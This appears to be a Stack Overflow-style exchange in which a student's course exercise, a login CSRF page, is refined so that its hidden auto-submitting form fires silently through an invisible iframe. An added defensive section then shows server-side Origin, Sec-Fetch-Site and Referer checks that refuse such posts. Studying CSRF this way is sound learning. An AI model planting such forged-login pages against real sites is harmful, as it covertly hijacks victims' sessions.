I'm practicing a CSRF attack for my course and I have to attack a dummy website by creating a "fake" page. I have the following code
csrf.html
<!DOCTYPE html>
<head>CSRF_ATTACK_PT1</head>
<body>
<form name ='csrf_form' action='http://course_website/login' method="POST">
<input type='hidden' name='username' value='attacker_id'>
<input type='hidden' name='password' value='attacker_pw'>
</form>
<script>
document.csrf_form.submit();
</script>
</body>
The code above works perfectly, except that every time I open csrf.html it will also open up the course_website page. I just want it to remain on csrf.html and not redirect/open up a new tab.
After looking through SO (I don't know much js..), I tried
<script>
document.csrf_form.submit(function(){
return false;
});
</script>
and adding an onsubmit = return false; to the form itself, but neither works.
What is the best thing to do here?
PS: not sure if this changes anything, but I used action as opposed to target in my form because one works and the other does not. Anything that I have to watch out for?
but I used action as opposed to target in my form because one works and the other does not
target and action do completely different things.
action specifies the URL to send the request to. target specifies the frame to open the response to that request in.
If you don't want to leave the current page, then you need to specify the target as a frame or new window. Omitting it will cause the new page to load in the current window and replace the document containing the form.
It is also possible to (kinda) submit forms without leaving the page by cancelling the form submission and then simulating it with JavaScript (generally via the XMLHttpRequest object) instead. (A CSRF attack is going to be cross-origin though, so that approach will likely fail due to the Same Origin Policy).
E.g. of the above answer in your code
<!DOCTYPE html>
<head>CSRF_ATTACK_PT1</head>
<body>
<form name ='csrf_form' target='hiddenFrame' action='http://course_website/login' method="POST">
<input type='hidden' name='username' value='attacker_id'>
<input type='hidden' name='password' value='attacker_pw'>
</form>
<iframe name='hiddenFrame' style='display:none'></iframe>
<script>
document.csrf_form.submit();
</script>
</body>
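From the defending side, the form post discussed above can be refused at the login endpoint by checking where the request came from. This is an added example, not part of the original question or answers; the origin `https://course-website.example`, the function names and the sample header sets are assumptions made for illustration.

```javascript
// Added example. The origin below is an assumption standing in for the course site.
const ALLOWED_ORIGINS = new Set(['https://course-website.example']);

function originOf(url) {
  try { return new URL(url).origin; } catch { return null; }
}

// Decide whether a request to the login endpoint may proceed.
// `headers` uses lower-case names, as Node's http module provides them.
function checkLoginRequest(method, headers) {
  if (method === 'GET' || method === 'HEAD') return { allow: true, reason: 'safe method' };

  // 1. Fetch metadata, which browsers send only to HTTPS (trustworthy) URLs.
  //    Strict policy: anything other than same-origin is refused.
  const site = headers['sec-fetch-site'];
  if (site !== undefined && site !== 'same-origin') {
    return { allow: false, reason: 'sec-fetch-site=' + site };
  }
  // 2. Current browsers send Origin on cross-origin form POSTs; it is the string
  //    "null" when the submitting page is a local file or a sandboxed frame.
  const origin = headers['origin'];
  if (origin !== undefined) {
    return ALLOWED_ORIGINS.has(origin)
      ? { allow: true, reason: 'origin allowed' }
      : { allow: false, reason: 'origin=' + origin };
  }
  // 3. Fall back to Referer; with no origin information at all, fail closed.
  const ref = headers['referer'] ? originOf(headers['referer']) : null;
  return ref !== null && ALLOWED_ORIGINS.has(ref)
    ? { allow: true, reason: 'referer allowed' }
    : { allow: false, reason: 'no trusted origin information' };
}

// Constructed sample requests (header sets only), not captured traffic.
const SAMPLES = [
  ['same-origin login form', 'POST', { origin: 'https://course-website.example', 'sec-fetch-site': 'same-origin' }],
  ['form posted from a local file', 'POST', { origin: 'null' }],
  ['form posted from another site', 'POST', { origin: 'https://other.example', 'sec-fetch-site': 'cross-site' }],
  ['older client, Referer only', 'POST', { referer: 'https://course-website.example/login' }],
  ['no Origin or Referer', 'POST', {}],
];

function runSamples() {
  return SAMPLES.map(([label, method, headers]) => ({ label, ...checkLoginRequest(method, headers) }));
}

for (const r of runSamples()) console.log(r.allow ? 'ALLOW' : 'DENY ', r.label, '(' + r.reason + ')');
```

Cookie-based defences such as SameSite do not cover this case, because a forged login carries its credentials in the form body and needs no existing session cookie. A per-form token issued with the login page is the usual second layer.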